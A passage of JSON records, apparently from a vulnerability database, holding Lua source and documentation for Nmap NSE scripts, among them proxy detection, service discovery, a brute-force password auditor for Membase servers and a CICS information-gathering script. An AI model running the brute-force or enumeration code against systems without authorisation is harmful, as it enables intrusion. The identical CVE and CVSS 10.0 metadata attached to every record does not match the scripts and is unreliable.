"confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2015-11-05T20:41:05", "id": "NMAP:HTTP-TRACEROUTE.NSE", "href": "https://nmap.org/nsedoc/scripts/http-traceroute.html", "sourceData": "local http = require \"http\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal table = require \"table\"\n\ndescription = [[\nExploits the Max-Forwards HTTP header to detect the presence of reverse proxies.\n\nThe script works by sending HTTP requests with values of the Max-Forwards HTTP\nheader varying from 0 to 2 and checking for any anomalies in certain response\nvalues such as the status code, Server, Content-Type and Content-Length HTTP\nheaders and body values such as the HTML title.\n\nBased on the work of:\n* Nicolas Gregoire (nicolas.gregoire@agarri.fr)\n* Julien Cayssol (tools@aqwz.com)\n\nFor more information, see:\n* http://www.agarri.fr/kom/archives/2011/11/12/traceroute-like_http_scanner/index.html\n]]\n\n---\n-- @args http-traceroute.path The path to send requests to. Defaults to <code>/</code>.\n-- @args http-traceroute.method HTTP request method to use. 
Defaults to <code>GET</code>.\n-- Among other values, TRACE is probably the most interesting.\n--\n-- @usage\n-- nmap --script=http-traceroute <targets>\n--\n--@output\n-- PORT STATE SERVICE REASON\n-- 80/tcp open http syn-ack\n-- | http-traceroute:\n-- | HTML title\n-- | Hop #1: Twitter / Over capacity\n-- | Hop #2: t.co / Twitter\n-- | Hop #3: t.co / Twitter\n-- | Status Code\n-- | Hop #1: 502\n-- | Hop #2: 200\n-- | Hop #3: 200\n-- | server\n-- | Hop #1: Apache\n-- | Hop #2: hi\n-- | Hop #3: hi\n-- | content-type\n-- | Hop #1: text/html; charset=UTF-8\n-- | Hop #2: text/html; charset=utf-8\n-- | Hop #3: text/html; charset=utf-8\n-- | content-length\n-- | Hop #1: 4833\n-- | Hop #2: 3280\n-- | Hop #3: 3280\n-- | last-modified\n-- | Hop #1: Thu, 05 Apr 2012 00:19:40 GMT\n-- | Hop #2\n-- |_ Hop #3\n\nauthor = \"Hani Benhabiles\"\n\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\ncategories = {\"discovery\", \"safe\"}\n\n\nportrule = shortport.service(\"http\")\n\n--- Attempts to extract the html title\n-- from an HTTP response body.\n--@param responsebody Response's body.\nlocal function extract_title (responsebody)\n return responsebody:match \"<title>(.-)</title>\"\nend\n\n--- Attempts to extract the X-Forwarded-For header\n-- from an HTTP response body in case of TRACE requests.\n--@param responsebody Response's body.\nlocal function extract_xfwd (responsebody)\n return responsebody:match \"X-Forwarded-For: [^\\r\\n]*\"\nend\n\n--- Check for differences in response headers, status code\n-- and html title between responses.\n--@param responses Responses to compare.\n--@param method Used HTTP method.\nlocal compare_responses = function(responses, method)\n local response, key\n local results = {}\n local result = {}\n local titles = {}\n local interesting_headers = {\n 'server',\n 'via',\n 'x-via',\n 'x-forwarded-for',\n 'content-type',\n 'content-length',\n 'last-modified',\n 'location',\n }\n\n -- Check page title\n for key,response in 
pairs(responses) do\n titles[key] = extract_title(response.body)\n end\n if titles[1] ~= titles[2] or\n titles[1] ~= titles[3] then\n\n table.insert(results, 'HTML title')\n for key,response in pairs(responses) do\n table.insert(result, \"Hop #\" .. key .. \": \" .. titles[key])\n end\n table.insert(results, result)\n end\n\n -- Check status code\n if responses[1].status == 502 or\n responses[1].status == 483 or\n responses[1].status ~= responses[2].status or\n responses[1].status ~= responses[3].status then\n\n result = {}\n table.insert(results, 'Status Code')\n for key,response in pairs(responses) do\n table.insert(result, \"Hop #\" .. key .. \": \" .. tostring(response.status))\n end\n table.insert(results, result)\n end\n\n -- Check headers\n for _,header in pairs(interesting_headers) do\n -- Compare header of different responses\n if responses[1].header[header] ~= responses[2].header[header] or\n responses[1].header[header] ~= responses[3].header[header] then\n\n result = {}\n table.insert(results, header)\n for key,response in pairs(responses) do\n if response.header[header] ~= nil then\n table.insert(result, \"Hop #\" .. key .. \": \" .. tostring(response.header[header]))\n else\n table.insert(result, \"Hop #\" .. key)\n end\n end\n table.insert(results, result)\n end\n end\n\n -- Check for X-Forwarded-For in the response body\n -- when using TRACE method\n if method == \"TRACE\" then\n local xfwd = extract_xfwd(responses[1].body)\n if xfwd ~= nil then\n table.insert(results, xfwd)\n end\n end\n\n return results\nend\n\naction = function(host, port)\n local path = stdnse.get_script_args(SCRIPT_NAME .. '.path') or \"/\"\n local method = stdnse.get_script_args(SCRIPT_NAME .. 
'.method') or \"GET\"\n local responses = {}\n local detected = \"Possible reverse proxy detected.\"\n\n for i = 0,2 do\n local response = http.generic_request(host, port, method, path, { ['header'] = { ['Max-Forwards'] = i }, ['no_cache'] = true})\n table.insert(responses, response)\n end\n\n -- Check results\n local results = compare_responses(responses, method)\n if results ~= nil and nmap.verbosity() == 1 then\n return stdnse.format_output(true,detected)\n else\n return stdnse.format_output(true,results)\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:40:57", "description": "Performs brute force password auditing against Couchbase Membase servers.\n\n## Script Arguments \n\n#### membase-brute.bucketname \n\nif specified, password guessing is performed only against this bucket.\n\n#### creds.[service], creds.global \n\nSee the documentation for the [creds](<../lib/creds.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n#### brute.credfile, brute.delay, brute.emptypass, brute.firstonly, brute.guesses, brute.mode, brute.passonly, brute.retries, brute.start, brute.threads, brute.unique, brute.useraspass \n\nSee the documentation for the [brute](<../lib/brute.html#script-args>) library. \n\n#### passdb, unpwdb.passlimit, unpwdb.timelimit, unpwdb.userlimit, userdb \n\nSee the documentation for the [unpwdb](<../lib/unpwdb.html#script-args>) library. \n\n#### membase.authmech \n\nSee the documentation for the [membase](<../lib/membase.html#script-args>) library. 
\n\n## Example Usage \n \n \n nmap -p 11211 --script membase-brute\n \n\n## Script Output \n \n \n PORT STATE SERVICE\n 11211/tcp open unknown\n | membase-brute:\n | Accounts\n | buckettest:toledo - Valid credentials\n | Statistics\n |_ Performed 5000 guesses in 2 seconds, average tps: 2500\n \n\n## Requires \n\n * [brute](<../lib/brute.html>)\n * [creds](<../lib/creds.html>)\n * [membase](<../lib/membase.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-01-10T18:19:21", "type": "nmap", "title": "membase-brute NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-03-10T03:09:39", "id": "NMAP:MEMBASE-BRUTE.NSE", "href": "https://nmap.org/nsedoc/scripts/membase-brute.html", "sourceData": "local brute = require \"brute\"\nlocal creds = require \"creds\"\nlocal membase = require \"membase\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\n\ndescription = [[\nPerforms brute force password auditing against Couchbase Membase 
servers.\n]]\n\n---\n-- @usage\n-- nmap -p 11211 --script membase-brute\n--\n-- @output\n-- PORT STATE SERVICE\n-- 11211/tcp open unknown\n-- | membase-brute:\n-- | Accounts\n-- | buckettest:toledo - Valid credentials\n-- | Statistics\n-- |_ Performed 5000 guesses in 2 seconds, average tps: 2500\n--\n-- @args membase-brute.bucketname if specified, password guessing is performed\n-- only against this bucket.\n--\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"intrusive\", \"brute\"}\n\n\nportrule = shortport.port_or_service({11210,11211}, \"couchbase-tap\", \"tcp\")\n\nlocal arg_bucketname = stdnse.get_script_args(SCRIPT_NAME..\".bucketname\")\n\n\nDriver = {\n\n new = function(self, host, port, options)\n local o = { host = host, port = port, options = options }\n setmetatable(o, self)\n self.__index = self\n return o\n end,\n\n connect = function(self)\n self.helper = membase.Helper:new(self.host, self.port)\n return self.helper:connect(brute.new_socket())\n end,\n\n login = function(self, username, password)\n local status, response = self.helper:login(arg_bucketname or username, password)\n if ( not(status) and \"Auth failure\" == response ) then\n return false, brute.Error:new( \"Incorrect password\" )\n elseif ( not(status) ) then\n local err = brute.Error:new( response )\n err:setRetry( true )\n return false, err\n end\n return true, creds.Account:new( arg_bucketname or username, password, creds.State.VALID)\n end,\n\n disconnect = function(self)\n return self.helper:close()\n end\n\n}\n\n\nlocal function fail(err) return stdnse.format_output(false, err) end\n\nlocal function getMechs(host, port)\n local helper = membase.Helper:new(host, port)\n local status, err = helper:connect()\n if ( not(status) ) then\n return false, \"Failed to connect to server\"\n end\n\n local status, response = helper:getSASLMechList()\n if ( not(status) ) then\n stdnse.debug2(\"Received unexpected response: 
%s\", response)\n return false, \"Received unexpected response\"\n end\n\n helper:close()\n return true, response.mechs\nend\n\naction = function(host, port)\n\n local status, mechs = getMechs(host, port)\n\n if ( not(status) ) then\n return fail(mechs)\n end\n if ( not(mechs:match(\"PLAIN\") ) ) then\n return fail(\"Unsupported SASL mechanism\")\n end\n\n local result\n local engine = brute.Engine:new(Driver, host, port )\n\n engine.options.script_name = SCRIPT_NAME\n engine.options.firstonly = true\n\n if ( arg_bucketname ) then\n engine.options:setOption( \"passonly\", true )\n end\n\n status, result = engine:start()\n return result\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:41:54", "description": "Tests a list of known ICAP service names and prints information about any it detects. The Internet Content Adaptation Protocol (ICAP) is used to extend transparent proxy servers and is generally used for content filtering and antivirus scanning.\n\n## Example Usage \n \n \n nmap -p 1344 <ip> --script icap-info\n \n\n## Script Output \n \n \n PORT STATE SERVICE\n 1344/tcp open unknown\n | icap-info:\n | /avscan\n | Service: C-ICAP/0.1.6 server - Clamav/Antivirus service\n | ISTag: CI0001-000-0973-6314940\n | /echo\n | Service: C-ICAP/0.1.6 server - Echo demo service\n | ISTag: CI0001-XXXXXXXXX\n | /srv_clamav\n | Service: C-ICAP/0.1.6 server - Clamav/Antivirus service\n | ISTag: CI0001-000-0973-6314940\n | /url_check\n | Service: C-ICAP/0.1.6 server - Url_Check demo service\n |_ ISTag: CI0001-XXXXXXXXX\n \n \n\n## Requires \n\n * [nmap](<../lib/nmap.html>)\n * [match](<../lib/match.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [stringaux](<../lib/stringaux.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": 
"NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-05-22T18:34:25", "type": "nmap", "title": "icap-info NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-10-18T01:08:19", "id": "NMAP:ICAP-INFO.NSE", "href": "https://nmap.org/nsedoc/scripts/icap-info.html", "sourceData": "local nmap = require \"nmap\"\nlocal match = require \"match\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal stringaux = require \"stringaux\"\nlocal table = require \"table\"\n\ndescription = [[\nTests a list of known ICAP service names and prints information about\nany it detects. 
The Internet Content Adaptation Protocol (ICAP) is\nused to extend transparent proxy servers and is generally used for\ncontent filtering and antivirus scanning.\n]]\n\n---\n-- @usage\n-- nmap -p 1344 <ip> --script icap-info\n--\n-- @output\n-- PORT STATE SERVICE\n-- 1344/tcp open unknown\n-- | icap-info:\n-- | /avscan\n-- | Service: C-ICAP/0.1.6 server - Clamav/Antivirus service\n-- | ISTag: CI0001-000-0973-6314940\n-- | /echo\n-- | Service: C-ICAP/0.1.6 server - Echo demo service\n-- | ISTag: CI0001-XXXXXXXXX\n-- | /srv_clamav\n-- | Service: C-ICAP/0.1.6 server - Clamav/Antivirus service\n-- | ISTag: CI0001-000-0973-6314940\n-- | /url_check\n-- | Service: C-ICAP/0.1.6 server - Url_Check demo service\n-- |_ ISTag: CI0001-XXXXXXXXX\n--\n--\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"safe\", \"discovery\"}\n\n\nportrule = shortport.port_or_service(1344, \"icap\")\n\nlocal function fail(err) return stdnse.format_output(false, err) end\n\nlocal function parseResponse(resp)\n if ( not(resp) ) then\n return\n end\n\n local resp_p = { header = {}, rawheader = {} }\n local resp_tbl = stringaux.strsplit(\"\\r?\\n\", resp)\n\n if ( not(resp_tbl) or #resp_tbl == 0 ) then\n stdnse.debug2(\"Received an invalid response from server\")\n return\n end\n\n resp_p.status = tonumber(resp_tbl[1]:match(\"^ICAP/1%.0 (%d*) .*$\"))\n resp_p['status-line'] = resp_tbl[1]\n\n for i=2, #resp_tbl do\n local key, val = resp_tbl[i]:match(\"^([^:]*):%s*(.*)$\")\n if ( not(key) or not(val) ) then\n stdnse.debug2(\"Failed to parse header: %s\", resp_tbl[i])\n else\n resp_p.header[key:lower()] = val\n end\n table.insert(resp_p.rawheader, resp_tbl[i])\n end\n return resp_p\nend\n\naction = function(host, port)\n\n local services = {\"/avscan\", \"/echo\", \"/srv_clamav\", \"/url_check\", \"/nmap\" }\n local headers = {\"Service\", \"ISTag\"}\n local probe = {\n \"OPTIONS icap://%s%s ICAP/1.0\",\n \"Host: %s\",\n \"User-Agent: 
nmap icap-client/0.01\",\n \"Encapsulated: null-body=0\"\n }\n local hostname = stdnse.get_hostname(host)\n local result = {}\n\n for _, service in ipairs(services) do\n local socket = nmap.new_socket()\n socket:set_timeout(5000)\n if ( not(socket:connect(host, port)) ) then\n return fail(\"Failed to connect to server\")\n end\n\n local request = (table.concat(probe, \"\\r\\n\") .. \"\\r\\n\\r\\n\"):format(hostname, service, hostname)\n\n if ( not(socket:send(request)) ) then\n socket:close()\n return fail(\"Failed to send request to server\")\n end\n\n local status, resp = socket:receive_buf(match.pattern_limit(\"\\r\\n\\r\\n\", 2048), false)\n if ( not(status) ) then\n return fail(\"Failed to receive response from server\")\n end\n\n local resp_p = parseResponse(resp)\n if ( resp_p and resp_p.status == 200 ) then\n local result_part = { name = service }\n for _, h in ipairs(headers) do\n if ( resp_p.header[h:lower()] ) then\n table.insert(result_part, (\"%s: %s\"):format(h, resp_p.header[h:lower()]))\n end\n end\n table.insert(result, result_part)\n end\n end\n return stdnse.format_output(true, result)\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:45:20", "description": "Detects the Freelancer game server (FLServer.exe) service by sending a status query UDP probe. \n\nWhen run as a version detection script (`-sV`), the script will report on the server name, current number of players, maximum number of players, and whether it has a password set. When run explicitly (`--script freelancer-info`), the script will additionally report on the server description, whether players can harm other players, and whether new players are allowed. 
\n\nSee <http://sourceforge.net/projects/gameq/> (relevant files: games.ini, packets.ini, freelancer.php)\n\n## Example Usage \n \n \n nmap -sU -sV -p 2302 <target>\n nmap -sU -p 2302 --script=freelancer-info <target>\n\n## Script Output \n \n \n PORT STATE SERVICE REASON VERSION\n 2302/udp open freelancer udp-response Freelancer (name: Discovery Freelancer RP 24/7; players: 152/225; password: no)\n | freelancer-info:\n | server name: Discovery Freelancer RP 24/7\n | server description: This is the official discovery freelancer RP server. To know more about the server, please visit www.discoverygc.com\n | players: 152\n | max. players: 225\n | password: no\n | allow players to harm other players: yes\n |_ allow new players: yes\n \n\n## Requires \n\n * [comm](<../lib/comm.html>)\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [string](<>)\n * [stdnse](<../lib/stdnse.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2013-11-20T04:31:31", "type": "nmap", "title": "freelancer-info NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], 
"modified": "2017-03-13T14:58:56", "id": "NMAP:FREELANCER-INFO.NSE", "href": "https://nmap.org/nsedoc/scripts/freelancer-info.html", "sourceData": "local comm = require \"comm\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal string = require \"string\"\nlocal stdnse = require \"stdnse\"\n\ndescription = [[\nDetects the Freelancer game server (FLServer.exe) service by sending a\nstatus query UDP probe.\n\nWhen run as a version detection script (<code>-sV</code>), the script\nwill report on the server name, current number of players, maximum\nnumber of players, and whether it has a password set. When run\nexplicitly (<code>--script freelancer-info</code>), the script will\nadditionally report on the server description, whether players can harm\nother players, and whether new players are allowed.\n\nSee http://sourceforge.net/projects/gameq/\n(relevant files: games.ini, packets.ini, freelancer.php)\n]]\n\n---\n-- @usage\n-- nmap -sU -sV -p 2302 <target>\n-- nmap -sU -p 2302 --script=freelancer-info <target>\n-- @output\n-- PORT STATE SERVICE REASON VERSION\n-- 2302/udp open freelancer udp-response Freelancer (name: Discovery Freelancer RP 24/7; players: 152/225; password: no)\n-- | freelancer-info:\n-- | server name: Discovery Freelancer RP 24/7\n-- | server description: This is the official discovery freelancer RP server. To know more about the server, please visit www.discoverygc.com\n-- | players: 152\n-- | max. players: 225\n-- | password: no\n-- | allow players to harm other players: yes\n-- |_ allow new players: yes\n--\n-- @xmloutput\n-- <elem key=\"server name\">Discovery Freelancer RP 24/7</elem>\n-- <elem key=\"server description\">This is the official discovery freelancer RP server. To know more about the server, please visit www.discoverygc.com</elem>\n-- <elem key=\"players\">152</elem>\n-- <elem key=\"max. 
players\">225</elem>\n-- <elem key=\"password\">no</elem>\n-- <elem key=\"allow players to harm other players\">yes</elem>\n-- <elem key=\"allow new players\">yes</elem>\n\nauthor = \"Marin Mar\u017ei\u0107\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = { \"default\", \"discovery\", \"safe\", \"version\" }\n\nportrule = shortport.version_port_or_service({2302}, \"freelancer\", \"udp\")\n\naction = function(host, port)\n local status, data = comm.exchange(host, port,\n \"\\x00\\x02\\xf1\\x26\\x01\\x26\\xf0\\x90\\xa6\\xf0\\x26\\x57\\x4e\\xac\\xa0\\xec\\xf8\\x68\\xe4\\x8d\\x21\",\n { timeout = 3000 })\n if not status then\n return\n end\n\n -- port is open\n nmap.set_port_state(host, port, \"open\")\n\n local passwordbyte, maxplayers, numplayers, name, pvpallow, newplayersallow, description =\n string.match(data, \"^\\x00\\x03\\xf1\\x26............(.)...(.)...(.)...................................................................(.*)\\0\\0(.):(.):.*:.*:.*:(.*)\\0\\0$\")\n if not passwordbyte then\n return\n end\n\n local o = stdnse.output_table()\n\n o[\"server name\"] = string.gsub(name, \"[^%g%s]\", \"\")\n o[\"server description\"] = string.gsub(description, \"[^%g%s]\", \"\")\n o[\"players\"] = numplayers:byte(1) - 1\n o[\"max. 
players\"] = maxplayers:byte(1) - 1\n\n passwordbyte = passwordbyte:byte(1)\n if passwordbyte & 128 ~= 0 then\n o[\"password\"] = \"yes\"\n else\n o[\"password\"] = \"no\"\n end\n\n o[\"allow players to harm other players\"] = \"n/a\"\n if pvpallow == \"1\" then\n o[\"allow players to harm other players\"] = \"yes\"\n elseif pvpallow == \"0\" then\n o[\"allow players to harm other players\"] = \"no\"\n end\n\n o[\"allow new players\"] = \"n/a\"\n if newplayersallow == \"1\" then\n o[\"allow new players\"] = \"yes\"\n elseif newplayersallow == \"0\" then\n o[\"allow new players\"] = \"no\"\n end\n\n port.version.name = \"freelancer\"\n port.version.name_confidence = 10\n port.version.product = \"Freelancer\"\n port.version.extrainfo = \"name: \" .. o[\"server name\"] .. \"; players: \" ..\n o[\"players\"] .. \"/\" .. o[\"max. players\"] .. \"; password: \" .. o[\"password\"]\n\n nmap.set_port_version(host, port, \"hardmatched\")\n\n return o\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:46:41", "description": "Discovers Versant object databases using the broadcast srvloc protocol.\n\n## Example Usage \n \n \n nmap --script broadcast-versant-locate\n \n\n## Script Output \n \n \n Pre-scan script results:\n | broadcast-versant-locate:\n |_ vod://192.168.200.222:5019\n \n\n## Requires \n\n * [srvloc](<../lib/srvloc.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-03-08T17:51:48", "type": "nmap", "title": "broadcast-versant-locate NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": 
"HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2015-11-05T20:41:05", "id": "NMAP:BROADCAST-VERSANT-LOCATE.NSE", "href": "https://nmap.org/nsedoc/scripts/broadcast-versant-locate.html", "sourceData": "local srvloc = require \"srvloc\"\nlocal table = require \"table\"\n\ndescription = [[\nDiscovers Versant object databases using the broadcast srvloc protocol.\n]]\n\n---\n-- @usage\n-- nmap --script broadcast-versant-locate\n--\n-- @output\n-- Pre-scan script results:\n-- | broadcast-versant-locate:\n-- |_ vod://192.168.200.222:5019\n--\n-- @xmloutput\n-- <table>\n-- <elem>vod://192.168.200.222:5019</elem>\n-- </table>\n\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"broadcast\", \"safe\"}\n\n\nprerule = function() return true end\n\naction = function()\n local helper = srvloc.Helper:new()\n local status, result = helper:ServiceRequest(\"service:odbms.versant:vod\", \"default\")\n helper:close()\n\n if ( not(status) ) then return end\n local output = {}\n for _, v in ipairs(result) do\n table.insert(output, v:match(\"^service:odbms.versant:vod://(.*)$\"))\n end\n return output\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:46:32", "description": "Using the CICS transaction CEMT, this script attempts to gather information about the current CICS transaction server region. It gathers OS information, Datasets (files), transactions and user ids. 
Based on CICSpwn script by Ayoub ELAASSAL.\n\n## Script Arguments \n\n#### cics-info.trans \n\nInstead of gathering all transaction IDs, supplying a name here will make the script look up only one transaction ID\n\n#### cics-info.pass \n\nPassword to use if access to CEMT requires authentication\n\n#### cics-info.cemt \n\nCICS Transaction ID to be used. Default is `CEMT`\n\n#### cics-info.user \n\nUsername to use if access to CEMT requires authentication\n\n#### cics-info.commands \n\nCommand used to access cics. Default is `cics`\n\n## Example Usage \n \n \n nmap --script=cics-info -p 23 <targets>\n \n nmap --script=cics-info --script-args cics-info.commands='logon applid(coolcics)',\n cics-info.user=test,cics-info.pass=test,cics-info.cemt='ZEMT',\n cics-info.trans=CICA -p 23 <targets>\n \n\n## Script Output \n \n \n PORT STATE SERVICE VERSION\n 23/tcp open tn3270 IBM Telnet TN3270 (TN3270E)\n | cics-info:\n | Security: Disabled\n | System:\n | z/OS Version: 02.01.00\n | CICS Version: 05.02.00\n | System ID: CICS\n | Application ID: CICSFAKE\n | Default User: USERCICS\n | Datasets:\n | CICS.FILEA\n | HLQ123.CICS.DFHCSD\n | HLQ123.CICS.DFHLRQ\n | Libraries:\n | HLQ123.CICS.SDFHLOAD\n | Users:\n | USERCICS\n | Transaction / Program:\n | AADD / DFH$AALL\n | ABRW / DFH$ABRW\n | AINQ / DFH$AALL\n | AMNU / DFH$AMNU\n | AORD / DFH$AREN\n | AORQ / DFH$ACOM\n | AREP / DFH$AREP\n | AUPD / DFH$AALL\n | CADP / DFHDPLU\n ...\n | CEDX / DFHEDFP\n | CEGN / DFHCEGN\n | CEHP / DFHCHS\n | CEHS / DFHCHS\n | CEJR / DFHEJITL\n | CEMN / DFHCEMNA\n | CEMT / DFHEMTP\n | CEOT / DFHEOTP\n | CXRT / DFHCRT\n | DSNC / DFHD2CM1\n\n## Requires \n\n * [stdnse](<../lib/stdnse.html>)\n * [shortport](<../lib/shortport.html>)\n * [stringaux](<../lib/stringaux.html>)\n * [tn3270](<../lib/tn3270.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": 
"NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-03-01T20:41:18", "type": "nmap", "title": "cics-info NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2019-06-27T19:13:41", "id": "NMAP:CICS-INFO.NSE", "href": "https://nmap.org/nsedoc/scripts/cics-info.html", "sourceData": "local stdnse = require \"stdnse\"\nlocal shortport = require \"shortport\"\nlocal stringaux = require \"stringaux\"\nlocal tn3270 = require \"tn3270\"\nlocal table = require \"table\"\n\n\ndescription = [[\nUsing the CICS transaction CEMT, this script attempts to gather information\nabout the current CICS transaction server region. It gathers OS information,\nDatasets (files), transactions and user ids. Based on CICSpwn script by\nAyoub ELAASSAL.\n]]\n\n---\n-- @args cics-info.commands Command used to access cics. Default is <code>cics</code>\n-- @args cics-info.cemt CICS Transaction ID to be used. 
